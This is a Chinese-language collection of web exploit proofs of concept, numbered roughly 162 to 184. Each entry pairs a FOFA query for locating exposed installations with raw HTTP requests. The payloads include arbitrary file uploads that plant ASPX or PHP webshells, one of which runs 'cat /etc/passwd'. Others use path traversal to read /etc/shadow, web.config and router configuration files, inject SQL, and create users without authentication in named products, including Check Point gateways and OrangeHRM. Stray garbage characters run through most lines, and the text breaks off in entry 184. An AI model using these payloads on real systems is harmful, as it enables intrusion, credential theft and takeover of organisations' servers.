$ B2 G( l s9 fPOST /Webservice.asmx HTTP/1.1
, j% [( _/ B- ^' |% U# Q. y+ w3 VHost: x.x.x.x% m! N' I) s7 a; b2 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.367 [$ V, V" W1 ^$ ~ S, Z( {
Connection: close
6 L0 W+ Q; A& \* R4 i4 ]0 Y9 ~5 sContent-Length: 445+ ~* ~7 E' c C! k% t, o, s- [7 D0 a
Content-Type: text/xml
8 E& W7 H+ h; W! C, X: lAccept-Encoding: gzip
& s; ]! J* M* t* K
& |! x# K* r4 X$ f! _* O<?xml version="1.0" encoding="utf-8"?>
- }3 ^# H* Q: s0 W<soap:Envelope xmlns:xsi="
. o, ^6 l, v1 H* w# m3 H, ohttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" i* D9 B# M) c c
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"># e" R7 Z/ i' U9 k% Q) ?
<soap:Body>
( N; {3 x+ l6 C) C/ v: P ?+ K<UploadResume xmlns="http://tempuri.org/">0 f9 ~& o# \" b2 P0 ^
<ip>1</ip>' W' a/ q5 F$ E& k& K0 i
<fileName>../../../../dizxdell.aspx</fileName>
4 c5 I3 ^7 I5 V, j) c. x$ P<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>* V$ C+ x! A% @% z2 ~
<tag>3</tag>2 e) s1 y& y7 |* u3 N7 j) L, M+ c; i
</UploadResume>: b( j; p3 m5 |6 F
</soap:Body>
) M. _! x2 E- U2 J9 f: q9 `</soap:Envelope>; p4 M& o$ ~4 i/ ~4 x! |
; f; d" j2 B: I. a3 [( I& F% `$ s
9 N) t9 a' s/ e* Z7 v' c. vhttp://x.x.x.x/dizxdell.aspx
, x; i: v, H9 I" m5 F; I+ ?' A' ]2 E% ] h& P
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传0 W' _/ V3 D# b
FOFA: app="和丰山海-数字标牌"
+ K0 ]7 l7 I( L! ]- A3 @0 G5 t- |& \POST /QH.aspx HTTP/1.1& [+ k( S0 M. X+ m* s
Host: x.x.x.x1 q: N1 p# n5 f5 C' p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.03 Q. m% ?4 L, u/ W% y' m" t
Connection: close; _; f8 v' c" C$ s# h
Content-Length: 583
% }' Y' }0 d( S% qContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey; D/ t! U' R6 L$ r* X
Accept-Encoding: gzip! K2 k! d' R/ |2 l
2 K/ x" ~0 t" s8 X5 A
------WebKitFormBoundaryeegvclmyurlotuey
; v& B ~/ Q. m, S1 p4 ^( g# _& vContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
1 [: u/ I1 s) E% u3 P$ k6 fContent-Type: application/octet-stream
# L" ]1 R$ W* q* l
" E4 z$ V* k! R" C1 y<% response.write("ujidwqfuuqjalgkvrpqy") %>
( o. H2 G7 O! {% y------WebKitFormBoundaryeegvclmyurlotuey
8 z$ i) U% D1 C. |9 l, P+ t6 RContent-Disposition: form-data; name="action"
, g: w8 {. a: `3 o- g% V5 d9 c7 v
( U: _7 Z: y; e8 f' o, s& y; gupload
8 O9 b% h( F3 C! C/ b------WebKitFormBoundaryeegvclmyurlotuey5 P& C/ q- @: s) z* [
Content-Disposition: form-data; name="responderId"; m0 k" |0 ~3 f- g
" I4 k# k5 \7 mResourceNewResponder% Z5 L" L' g- t2 f5 q/ O% M3 v* m
------WebKitFormBoundaryeegvclmyurlotuey+ v' ]: D3 s; r6 e* H& m2 o
Content-Disposition: form-data; name="remotePath"* l) L: H) W6 R* T+ ]2 g: \7 w% u
$ O9 W0 Y9 w( \# S
/opt/resources
$ R9 y0 p( d7 D9 f# B, m6 z------WebKitFormBoundaryeegvclmyurlotuey--* v/ R4 V$ w& J
; U2 p b( X% r$ f7 e- B2 f
, e! l# O7 I3 |7 _. P2 J9 r+ [http://x.x.x.x/opt/resources/kjuhitjgk.aspx
' z% Q2 p; ^5 o3 M5 f/ U; O' R9 R# {# O5 e6 Q, w) C3 Y
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传' i/ ]8 e8 Y- Z6 J0 c$ a' T. T/ d
FOFA: icon_hash="-795291075"
2 Q0 V6 e8 J- D$ I4 I; w0 Q2 T( OPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
5 L) }' [7 d, ^6 |; y& U# T( OHost: x.x.x.x
6 s' [4 E% S4 w1 M2 }1 o. GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36% B& L- A' v/ y) _/ m4 ]
Connection: close
1 x8 t( q j7 ?- O5 iContent-Length: 293
2 b/ T2 V# ~/ J$ |, ?( n* uAccept: */*
; V9 Q [3 \5 ^ {; NAccept-Encoding: gzip, deflate
, |1 P Q- L7 c+ qAccept-Language: zh-CN,zh;q=0.9& }* d; y& e6 X2 T! Q. d
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod4 x7 y+ @, ` T( [( o& }) S' T
, S! _% x; X* I( H3 J------iiqvnofupvhdyrcoqyuujyetjvqgocod
# X% ^4 ~' v! M* x, E' `Content-Disposition: form-data; name="name"
, X! R3 u2 _, e* [9 n) V; _/ ]
6 t: L- m: J. s, U( Z: x5 D1.php6 e: d% I) b7 I# y+ g6 d( }
------iiqvnofupvhdyrcoqyuujyetjvqgocod
" J; r3 R" C: b& {- h GContent-Disposition: form-data; name="upfile"; filename="1.php"& E: r& i7 @: ?; p2 j6 L* t# ?" B
Content-Type: image/jpeg) {. _- p5 n' @# a$ A8 t. [: u
; m1 j7 {6 e; Y3 L- d
rvjhvbhwwuooyiioxega- c5 ^6 ]' Y# J8 n) ?/ g. d3 G; `3 t
------iiqvnofupvhdyrcoqyuujyetjvqgocod--8 t+ m& c; o5 R6 h9 ]
, h- V8 D: G1 ?5 D' K/ `7 [
: c' g) F& a% |8 M1 W" M164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传+ ?: [5 a8 u5 E$ ~ S3 P) n$ A
FOFA: title="智慧综合管理平台登入"8 s2 x5 o' A2 L
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1/ F9 [4 A* C- r; H1 d5 J5 e
Host: x.x.x.x
% O3 L8 E1 R1 S7 A8 h7 u6 G5 f( DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
. @* Y: @2 `4 hContent-Length: 288# S: B5 D3 c% E, G9 e& ]) m, E
Accept: application/json, text/javascript, */*; q=0.01
9 J" z x( I1 u; lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
4 U. O+ H% {9 X" ?' m+ QConnection: close
, I" g9 k! }1 [8 _2 xContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl/ ~7 z2 G- u/ d0 _; o) v5 P6 B$ S
X-Requested-With: XMLHttpRequest
8 Y- F9 p+ r' c8 x6 i# ZAccept-Encoding: gzip8 w c3 O2 I( R: v( O3 ?
; q1 d3 r2 `+ P. R& C------dqdaieopnozbkapjacdbdthlvtlyl
, y9 L+ Y" F1 h* o/ LContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"' T! {8 G! J( U5 _* y6 I/ |
Content-Type: image/jpeg
% D _2 I9 B' ^$ o9 g5 X! q" `/ f* f0 ]
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>1 i% _: p" A: Z% k1 Y
------dqdaieopnozbkapjacdbdthlvtlyl--& K; A0 C/ W' ^
, U' g6 G& _ h* h6 v2 k
; c8 A3 n, i0 d- ^# mhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
5 Q& k# {1 p @. q1 U" w3 q" ~
1 S! {" J, ?, y; t165. OrangeHRM 3.3.3 SQL 注入' [$ y# h# I* V$ _( ]0 N
CVE-2024-364283 g9 u6 V) q# {% _% T$ D
FOFA: app="OrangeHRM-产品"
. ^% q5 ]( h: f$ {URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))* ]1 p4 ]# t- W9 B
0 ]& ]0 I/ J, m# @) l, g7 B' k
# {$ P: J/ Z& [: h& ~% X" ?166. 中成科信票务管理平台SeatMapHandler SQL注入$ P4 I( H9 N$ [
FOFA:body="技术支持:北京中成科信科技发展有限公司"
8 S& q7 ?3 N9 E. s3 G. b/ gPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1+ j( S8 K! E9 `; w( S; \& v
Host:( G" Y* A j9 c5 G) H
Pragma: no-cache7 B$ L- v) i- l
Cache-Control: no-cache4 }: e* Z! u- ?
Upgrade-Insecure-Requests: 1
: F8 I3 k7 Z) ]' J! M& EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
1 E6 g5 ?$ z c7 wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ Y7 U, b. b) O4 xAccept-Encoding: gzip, deflate1 y7 ]3 h6 K# d9 S8 D, L
Accept-Language: zh-CN,zh;q=0.9,en;q=0.87 ]& o4 x2 d& J' i9 H
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE8 {. }; ^- |% ], R' U) Y7 }
Connection: close
& `3 l8 T. N! QContent-Type: application/x-www-form-urlencoded
- i; I! S- F# eContent-Length: 89
/ @3 @+ K |/ j: v- g2 A& E; l5 ^7 {& S8 w) r# x# Z+ b
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
( [, C6 n5 Q8 u4 @" g- m, w/ \' J( H9 V; u& ~$ h) M2 U
8 h I! @& r" o9 \+ V+ t167. 精益价值管理系统 DownLoad.aspx任意文件读取
- \7 R1 v$ ~- A+ r3 R6 [" ~FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"4 H! [+ ?4 \ t" V
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.13 e/ I8 u8 W6 x# ]0 g
Host:
! }! T9 K( E- `5 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ i$ q7 d) }% G9 E0 d& s9 B/ u
Content-Type: application/x-www-form-urlencoded
% W( [' z9 A! X2 ~$ ZAccept-Encoding: gzip, deflate
5 ?% u6 a- _( f+ oAccept: */*
R" V9 D. F9 | K8 RConnection: keep-alive8 t* ^: r, V5 x& d6 g
! x) q9 G! Z% I" N# D
1 ]6 C7 ~+ s* r& R
168. 宏景EHR OutputCode 任意文件读取; K% |! P1 `& t" y m& x, G
FOFA:app="HJSOFT-HCM"
( M/ m& g7 |$ z6 iGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1: x0 l6 T/ v2 y& e
Host: your-ip" w' L/ K0 W" W' K6 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
9 q5 h4 e- l6 m; yContent-Type: application/x-www-form-urlencoded* v( I1 F# v6 T2 x3 R& r
Connection: close) w$ _8 l, E. |7 z. }
: k0 a' ^+ l* o" K5 Q% z1 |* ?" E1 `
8 m$ Z9 N3 j6 w3 J$ N0 M
, y9 D9 F5 k6 K2 C% d% W169. 宏景EHR downlawbase SQL注入( W: ^4 c) @) q; `. W& p7 W7 ^7 y
FOFA:app="HJSOFT-HCM"
1 V7 o1 a" h. p3 J+ n% N' i4 o2 | VGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.19 E+ Z9 \6 ~/ b3 q4 l
Host: your-ip& s2 z% K' r( k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 R4 S, a, H4 n2 T: g8 U$ h2 y/ DAccept: */*8 i) o) E/ D7 D4 f: U9 m
Accept-Encoding: gzip, deflate0 l& R |( r) Z( v* w6 X
Connection: close
, e- L7 u+ [5 B3 |- V
! ]1 b$ d/ X/ y* M! E3 ]! v' ?- [+ x- E, g
8 P! r- \/ Y1 c/ b( o8 d
170. 宏景EHR DisplayExcelCustomReport 任意文件读取5 g$ j p( h8 g# | @6 s) b
FOFA:body="/general/sys/hjaxmanage.js"
: W) i' R4 D& \; h( B2 L' n( Y6 mPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
4 i) Z% }+ n$ m8 ?Host: balalanengliang
! ]9 q/ w& W# k3 h* K+ x" EUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 o7 k7 O5 _5 c4 k
Content-Type: application/x-www-form-urlencoded
" q. z2 Y& A# y; f# \( k+ Y" k2 h/ K
filename=../webapps/ROOT/WEB-INF/web.xml
8 e8 Q6 F( r6 h6 X4 x0 }
5 p: d$ K: B# i# m! i- e
" n) g) x8 j3 j% i+ b171. 通天星CMSV6车载定位监控平台 SQL注入
( X. ~: [/ _6 s& r% H* I3 JFOFA:body="/808gps/"+ r) Z c/ o* n! @# s$ I2 Q
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
$ H9 }4 U& m' l* `Host: your-ip: G4 _9 f& G! b7 U, b3 p4 V- D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0! `- O5 q7 i" A( Q$ V9 Y
Accept: */*
$ S; d" I9 ?' b; T! ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 L' h6 o8 V* c* y6 SAccept-Encoding: gzip, deflate0 D5 B7 ^* q3 {( d
Connection: close! e5 @ {6 `5 w8 G6 P# P
h8 x+ T$ k! E6 a) ]0 l F
5 z4 T% P* r3 {- X/ ~7 h
7 T1 B2 S; P. A172. DT-高清车牌识别摄像机任意文件读取
7 j+ B0 M1 ~+ N1 hFOFA:app="DT-高清车牌识别摄像机"
+ G" H+ ~0 ~, S7 T) _GET /../../../../etc/passwd HTTP/1.1
; L, f, r7 i' ^: D" c& w0 z/ ~Host: your-ip* M, N( S5 q" C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 l0 z( o8 `8 zAccept-Encoding: gzip, deflate
) T" D9 @1 T- I' n7 o6 D0 A0 d5 \2 }( vAccept: */*
& ]$ c, C. M2 \8 @7 s0 X- j3 y1 iConnection: keep-alive# J; w2 @. M$ B4 w( I" B: h
: W5 }7 t$ R- A0 k6 a! a
) N$ T8 x0 c, ~5 U, d9 I. O, o8 j( h1 i% b- G2 @
173. Check Point 安全网关任意文件读取& ~) i% z: e6 T2 @$ B7 D/ U
CVE-2024-24919/ W8 r& Y6 s0 ?# W* y- r( O
FOFA:app="Check_Point-SSL-Network-Extender"" X4 ~7 s; b0 M7 [6 l
POST /clients/MyCRL HTTP/1.1
7 W0 ]# b/ R% {5 |: P' YHost: your-ip' v) \9 X8 e9 N8 }) f
Content-Type: application/x-www-form-urlencoded& |+ S; A8 i0 H3 Q9 m$ |0 t
& T& `4 c& \' i
aCSHELL/../../../../../../../etc/shadow
6 n3 \9 `- C, r# w. \; y, p7 K. X1 ?/ y6 q1 e. `
3 f" @( I/ ]4 {6 E
" z3 q4 ]+ K5 x2 @; k- O& A174. 金和OA C6 FileDownLoad.aspx 任意文件读取
% b1 B! |) O: `8 e, k UFOFA:app="金和网络-金和OA"
; P& n: K% O# a) l, L( OGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.19 G% ~3 |0 _' g) ?0 F2 j/ p P9 k
Host: your-ip3 h) @0 h$ }+ P+ c+ D4 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 b& V3 P; r: ^) K0 I& V! m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" \9 G3 f$ E9 u- f
Accept-Encoding: gzip, deflate, br
' W* {1 }- o* @+ }' [+ @Accept-Language: zh-CN,zh;q=0.9
7 s* @. J2 _/ S, W+ q4 TConnection: close( u, P9 M7 u9 I
5 [/ t7 R9 J8 i1 @% n
0 ?9 |/ R8 r V. T( W: j; S l/ u( l& w( q8 _
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
% q) d1 \+ e; o7 `8 ? [FOFA:app="金和网络-金和OA"
9 E# x% y. L( ~3 s- i9 V& dGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1$ R! K! o2 E Y5 ?; ]/ K
Host:9 J6 H7 m9 I- s3 n
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 S" u: G; G9 OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- F$ c4 I, g* p, g- G0 [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# p. T. L J7 WAccept-Encoding: gzip, deflate1 d' Z& O+ p3 d4 T; ?# y
Connection: close
4 i# d2 A' X$ G( [Upgrade-Insecure-Requests: 1
, ?( s: x1 I5 ^
: p8 a6 W( S* U7 s* Z2 C4 W* _$ {
176. 电信网关配置管理系统 rewrite.php 文件上传
. j2 g& h/ V- N/ ?" \" A" z! p9 x |FOFA:body="img/login_bg3.png" && body="系统登录") K) g: K# n! z% H) V& Z
POST /manager/teletext/material/rewrite.php HTTP/1.1
" G0 u1 c/ ]6 M vHost: your-ip
4 f5 r" {7 D6 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
l- S) N- P( J6 N! [Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT. y1 K5 [/ j4 f4 b% B# z
Connection: close$ ^0 T. B1 r6 w9 _" v; [
5 p& v9 Z8 J. Y& w( F
------WebKitFormBoundaryOKldnDPT P" |; m4 s' c8 |7 j" r/ J5 g0 t
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
' E! U: \; D* e3 ~" o2 @Content-Type: image/png( K6 s' K) k2 o! G9 E: P; m3 a
. q+ Q2 \0 q! k7 N% }* ^<?php system("cat /etc/passwd");unlink(__FILE__);?>
, s/ p! u' y+ X" E; B2 e2 K------WebKitFormBoundaryOKldnDPT: t; V3 A% l2 V+ j2 _$ c
Content-Disposition: form-data; name="uploadtime"
7 G1 u4 d, a6 e: S/ e, S9 ] # A- J& L0 ~6 v/ [' y; S( B
6 _, x7 F1 y) M+ M) @4 h6 a* i: }* x
------WebKitFormBoundaryOKldnDPT--
6 E% A4 k, U5 d$ ]& n! }8 I
2 T- x, W q( k; t5 S" L, H
0 y) C/ d& a3 d+ k2 x- n( i* V0 b9 j. @+ h$ M$ ?
177. H3C路由器敏感信息泄露" c3 E: [" l% ?5 }5 P: P
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg* y, h- F X" u: J, Q* \; |% U) ]
/userLogin.asp/../actionpolicy_status/../M60.cfg: N' r" t6 ^6 }0 Y- X. S6 o. f3 H$ |
/userLogin.asp/../actionpolicy_status/../GR8300.cfg. H8 y/ k8 f/ G! a- R" T/ X
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
$ L/ h! @; V& a$ I, a. q/userLogin.asp/../actionpolicy_status/../GR3200.cfg
" X+ N3 c, z* ]& V/userLogin.asp/../actionpolicy_status/../GR2200.cfg
9 u h5 N4 U* V7 Z# L* F+ {/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
" W! n2 B( A2 V/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg/ ?- f( b; W# W$ ^/ z0 ?1 K
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
9 \9 k7 O7 V2 R5 X/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg" K, s1 L- B* w% U. ~
/userLogin.asp/../actionpolicy_status/../ER5200.cfg/ i5 K) I+ ^. ]
/userLogin.asp/../actionpolicy_status/../ER5100.cfg# M. `; C) g4 C3 f# @
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg3 E( _) t, \) f! e8 n8 I+ Z
/userLogin.asp/../actionpolicy_status/../ER3260.cfg$ q' P) p9 g8 N7 g5 T5 U
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg6 G9 J& {5 s' ~0 f: E2 J; m
/userLogin.asp/../actionpolicy_status/../ER3200.cfg r- G. ]2 v, \6 P3 V- B" `, R! W: Q
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
8 w% m0 j! d0 |* k# `4 u& x/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
: l& f" m8 S& ~5 |7 Y2 [/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
& Z5 l9 o4 q4 I/userLogin.asp/../actionpolicy_status/../ER3100.cfg" N! ^1 E( l$ ?: ?+ _) l
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
$ W9 f; V! B' a' m7 \! M+ T2 Q0 T o. O* m* G( L
. D3 i3 ?0 e" h. @
178. H3C校园网自助服务系统-flexfileupload-任意文件上传6 ?5 m1 p# V. W
FOFA:header="/selfservice"
) E7 r+ H( N1 ]7 tPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
* G( M6 S0 {0 Q/ X+ M* MHost:% D; s' H0 _* ~; }2 A7 g6 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
/ G' ~/ }, \. c, F8 G% I; q7 lContent-Length: 252- V% N& B% |2 I, X& O' o, l: I) c
Accept-Encoding: gzip, deflate: A1 T. H) P$ G& ]1 M$ a
Connection: close8 v% p2 H. S5 [" N7 r
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
" Z3 {8 ]& m7 V8 V: a-----------------aqutkea7vvanpqy3rh2l0 V9 ^& z7 x3 z
Content-Disposition: form-data; name="12234.txt"; filename="12234"
/ V; r$ ^# T8 I6 ~/ vContent-Type: application/octet-stream9 @" f, r! X; j; K. B8 |) \, F3 I
Content-Length: 255
7 c% R, R+ ^3 d6 t' N! ~) r8 @0 } n% b% p# V. I+ n k
12234
/ z' g8 i0 i1 Q0 l-----------------aqutkea7vvanpqy3rh2l--4 p. l* n3 l% |3 j K
9 u" l. X8 P' Z9 `6 C5 C" J+ d3 [) j3 ], j3 l' l, s$ U
GET /imc/primepush/%2e%2e/flex/12234.txt5 H! @& N, l8 H5 ?
' W4 x( Y! _' {
& I1 Z8 K+ D$ o; ~8 b( ?( _: Y179. 建文工程管理系统存在任意文件读取' G8 d* s+ P+ e( e( _
POST /Common/DownLoad2.aspx HTTP/1.1$ } m) M$ g! H( X/ _9 q
Host: {{Hostname}}
; N" A3 {& C$ l2 z" H* KContent-Type: application/x-www-form-urlencoded
" @+ _5 }4 W# }5 Y8 r1 V- \$ nUser-Agent: Mozilla/5.0
( Z- x) [5 q/ h% A8 m
+ t% R% W6 S, e! h! `; |path=../log4net.config&Name=- [' E6 Q; H0 T9 |+ Z
- x3 K! j6 w6 D* z
1 C$ J5 s# _' J, W- ?& e; E- @180. 帮管客 CRM jiliyu SQL注入
; s6 k( }! X# VFOFA:app="帮管客-CRM"
7 a2 f# |+ C4 q, k m0 @GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1# E0 W( }! T" `
Host: your-ip1 P" l7 a. Z7 M' |, |9 p: y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 U. z% \, L" h, T/ Q7 B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 L4 J8 z& G) x2 aAccept-Encoding: gzip, deflate
! B& K' @- N* ~; ?Accept-Language: zh-CN,zh;q=0.9
3 `/ D: x9 [" @Connection: close
' h) c# S9 ^' N+ u" L( g' R
9 V# u& \! T5 s; d1 l% d5 ^/ \; L, ~& a$ i: L' M/ V2 t$ D; E
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
8 ^& e3 Z, Z2 S D5 cFOFA:"PDCA/js/_publicCom.js"1 t, x e% b1 h! T. t' c
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1; o" B! Z& [( R2 [; U( R
Host: your-ip9 @' L9 O. [; K& l' B& o- U) z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36' t) a+ J$ L$ v4 |. W; a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 q4 `$ `( l2 T4 ?9 |Accept-Encoding: gzip, deflate, br
. q. o& |( l+ D) |Accept-Language: zh-CN,zh;q=0.9
% [3 m& `) N! u) Q8 AConnection: close" ?& M8 m0 _4 d& ]' X3 c& l
Content-Type: application/x-www-form-urlencoded
]) `0 `. u' L+ o% u" I- [( U( U( q$ K
3 x- `2 V$ C2 {- u1 C6 saction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=208 I9 L0 ?; t+ B& G1 D# F
/ U, {$ N" a1 @( u
3 \' x- n/ J8 e R4 C182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建, y" S4 O' }* M" F/ V
FOFA:"PDCA/js/_publicCom.js"
. h5 j1 t( L, Q/ _5 I3 ] ?POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.15 h1 h: \! F, f/ B( F
Host: your-ip, `9 Q# M8 t( ?, f+ @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
$ \2 G l9 C- l% O, T5 H1 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 B5 A* }7 o x, N- }Accept-Encoding: gzip, deflate, br/ |* r* `& j( c& G
Accept-Language: zh-CN,zh;q=0.9 H- |. P9 S5 }4 ]9 D0 u
Connection: close
) t" f/ ?+ S: hContent-Type: application/x-www-form-urlencoded0 u4 |/ d* M, m" J, f4 }9 T
1 i- O) L7 R; @
# h; d$ s. `$ I( e3 L4 c
username=test1234&pwd=test1234&savedays=11 z5 Y6 l3 _8 L% h$ I& S8 d
5 t; T) e, t. O4 g6 [+ z) A
9 { g6 l5 ?( m0 h9 w8 ]; D183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
, i/ l m# _ qFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
# t& P$ @1 y8 @" GGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
8 G/ R# _6 p; n ?/ j. [7 dHost: your-ip& P- r8 ~# ?9 ]+ |. K$ b2 m
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.367 b1 z( k: O) o0 j9 b! O
Accept-Charset: utf-8
! [- Z* m L( rAccept-Encoding: gzip, deflate+ V3 p+ C2 A8 P3 V7 P7 x7 ~
Connection: close1 v, K7 ~2 y3 Z: L( |1 C; B$ u
/ Q& ]$ q4 E9 {6 `4 l8 I: d; C8 D8 X5 C4 `6 W4 A
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加; q# I6 e) q. i* ]& d2 |! n) n# p
FOFA:server="SunFull-Webs"
' ?% M y1 i8 U0 wPOST /soap/AddUser HTTP/1.1
